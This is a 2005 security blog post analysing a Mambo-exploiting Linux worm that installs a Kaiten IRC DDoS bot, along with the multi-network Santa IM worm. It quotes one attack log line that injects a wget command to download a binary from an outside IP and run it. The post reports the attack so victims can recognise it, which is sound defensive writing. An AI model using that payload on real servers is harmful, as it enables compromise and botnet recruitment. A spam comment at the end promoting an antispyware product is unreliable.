worm blog: Two Minor Worms of Note: Kaiten, Santa

« 15th EICAR Annual Conference Call for Papers | Main | IM worms: A 2005 review »

Two Minor Worms of Note: Kaiten, Santa

It's Thursday, and that must mean some more worms on the loose. Two relatively minor worms of note if only just to evaluate the state of the attack these days.

First up is the newer variant of the Linux Mambo worm in the wild. Mambo has an arbitrary command execution vulnerability which is exploited by the worm to fetch the kickoff script for the worm. If you've been attacked, you will see loglines like this:

index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=
&mosConfig_absolute_path=http://209.136.48.69/cmd.gif?
&cmd=cd%%20/tmp;wget%%20209.136.48.69/micu;chmod%%20744%%20micu;./micu;

It looks like the download site (209.136.48.69) has been disabled, but it was up earlier this morning (which helped to delay me posting this information). The worm installs two components. The first, mare, is Mambo attack vector. The second is a variant of the Kaiten bot. This variant connects to the IRC servers us.undernet.org and eu.undernet.org and can launch the standard suite of DDoS attacks. The callgraph to this component, named "ro" in this instance, is graphed here. So, what's the state of the hack? Pretty lousy, to be honest, even worse than the Linux Slapper worm from 2002 or so. Instead of building one big binary, the worm fetches a Bash script which in turn fetches two more binaries and launches them. It would have been easier to fetch the malware from the attacking node (and not a central site) and bundle it all in one executable.

The second thing making the rounds today is a new IM worm. I've spent part of the day building a chart of IM worm activity for 2005 which I plan to post tomorrow. But, right now, the Santa worm is the new kid on the block. Unlike past IM worms which have stuck to one or two networks, this one affects users of the following major IM networks: AOL, MSN Messenger, Yahoo!, and ICQ. I didn't find another IM worm that used all four major networks in the past year, so this is probably the most interesting thing about this worm. Other than that, it spams potential victims with links, installs a rootkit, and can steal information from an infected machine.

Nothing too major, but some stuff worth noting. Seems like everyone wants their own worm this year.

December 22, 2005 in IM worms, new worms | Permalink
Tell others: digg submit | del.icio.us this | Reddit

Comments

Solution from Search-and-destroy.
If you own a computer, you must have antispyware to keep it running at its best. The problem is choosing a scan that works. I have tried many different types of scans in the past and then I ran across Search-and-destroy Antispyware. I have to say that the antispyware solution from Search-and-destroy is the best that I have used to date. It gets the job done and keeps my computer working like new. If you are interested in seeing for yourself just how good this antispyware works you can click on http://www.Search-and-destroy.com to learn more. I’m sure it would be worth your time to check it out.

Posted by: Chezy | May 1, 2009 1:24:17 PM